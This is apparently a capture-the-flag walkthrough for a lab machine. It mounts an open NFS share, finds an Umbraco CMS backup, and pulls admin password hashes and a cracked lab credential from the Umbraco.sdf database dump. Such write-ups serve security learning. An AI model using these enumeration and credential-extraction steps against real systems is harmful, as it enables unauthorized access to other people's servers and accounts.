NFS - 2049
showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)Mounting it to our machine:
mkdir nfs
sudo mount -t nfs 10.10.10.180:/ ./nfs -o nolockViewing contents:
┌──(anonmak9㉿anonmak9)-[~/Desktop/remote/nfs/site_backups]
└─$ ls
App_Browsers App_Data App_Plugins aspnet_client bin Config css default.aspx Global.asax Media scripts Umbraco Umbraco_Client Views Web.configWe see there is Umbraco which is a CMS, the one running on port 80.
It was my first time seeing this CMS so I went to google to find where Umbraco keeps credentials and I found that they are in the App_Data folder from this StackOverflow post. It also mentions the Umbraco.sdf file. Running file on it:
file Umbraco.sdf
Umbraco.sdf: dataContents of the .sdf file found from conversion:
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]
domainDefaultLanguage domainRootStructureID umbracoDomains domainName€ 3333umbracoDomains PK_umbracoDomains PK_umbracoDomains umbracoDomains PK_umbracoDomains umbracoDomains FK_umbracoDomains_umbracoNode_id PK_structure umbracoNode
__SysObjects umbracoLog umbracoLog umbracoLog userId umbracoLog NodeId
€ umbracoLog DF__umbracoLog__0000000000000179 Datestamp umbracoLog logHeader umbracoLog logComment ''''umbracoLog PK_umbracoLog PK_umbracoLog -yyyyyumbracoLog PK_umbracoLog -yyyyyumbracoLog IX_umbracoLog
__SysObjects cmsMacro cmsMacro uniqueId cmsMacro macroUseInEditor€ cmsMacro DF__cmsMacro__000000000000018E macroUseInEditor cmsMacro macroRefreshRate€ cmsMacro DF__cmsMacro__0000000000000193 macroRefreshRate cmsMacro macroAlias cmsMacro macroName cmsMacro macroScriptType cmsMacro macroScriptAssembly cmsMacro macroXSLT
cmsMacro macroCacheByPage€ cmsMacro DF__cmsMacro__00000000000001A2 macroCacheByPage
macroCachePersonalized€ cmsMacro DF__cmsMacro__00000000000001A7 macroCachePersonalized cmsMacro macroDontRender€ cmsMacro DF__cmsMacro__00000000000001AC macroDontRender
cmsMacro macroPython PK_cmsMacro PK_cmsMacro )uuuuucmsMacro PK_cmsMacro IX_cmsMacro_UniqueId cmsMacro IX_cmsMacroPropertyAlias
__SysObjects cmsMacroProperty cmsMacroProperty uniquePropertyId cmsMacroProperty editorAlias cmsMacroProperty macro macroPropertySortOrder 88888888€ cmsMacroProperty DF__cmsMacroProperty__00000000000001C6 macroPropertySortOrder macroPropertyAlias macroPropertyName€ 9999cmsMacroProperty PK_cmsMacroProperty PK_cmsMacroProperty cmsMacroProperty PK_cmsMacroProperty cmsMacroProperty IX_cmsMacroProperty_UniquePropertyId cmsMacroProperty IX_cmsMacroProperty_Alias cmsMacroProperty FK_cmsMacroProperty_cmsMacro_id PK_cmsMacro cmsMacro
[{"RefreshType":4,"RefresherId":"b29286dd-2d40-4ddb-b325-681226589fec","GuidId":"00000000-0000-0000-0000-000000000000","IntId":0,"JsonIds":null,"JsonIdCount":1,"JsonPayload":"[{\"Path\":\"-1,1147\",\"Id\":1147,\"Operation\":0}]"}]
192.168.195.1 192.168.195.137
192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.137 192.168.195.1 192.168.195.1 192.168.195.1
192.168.195.1 192.168.195.1
192.168.195.1 192.168.195.1 192.168.195.1 192.168.195.1 192.168.195.1
192.168.195.1
192.168.195.137
192.168.195.1 192.168.195.1 192.168.195.1 192.168.195.1
gration__0000000000000454 createDate umbracoMigration versionLooks like we got some admin user hash in SHA1 format:
We get the our first pair of credentials: [email protected]:baconandcheese
We also got another use smith who's hash is in HMACSHA256 format.
Last updated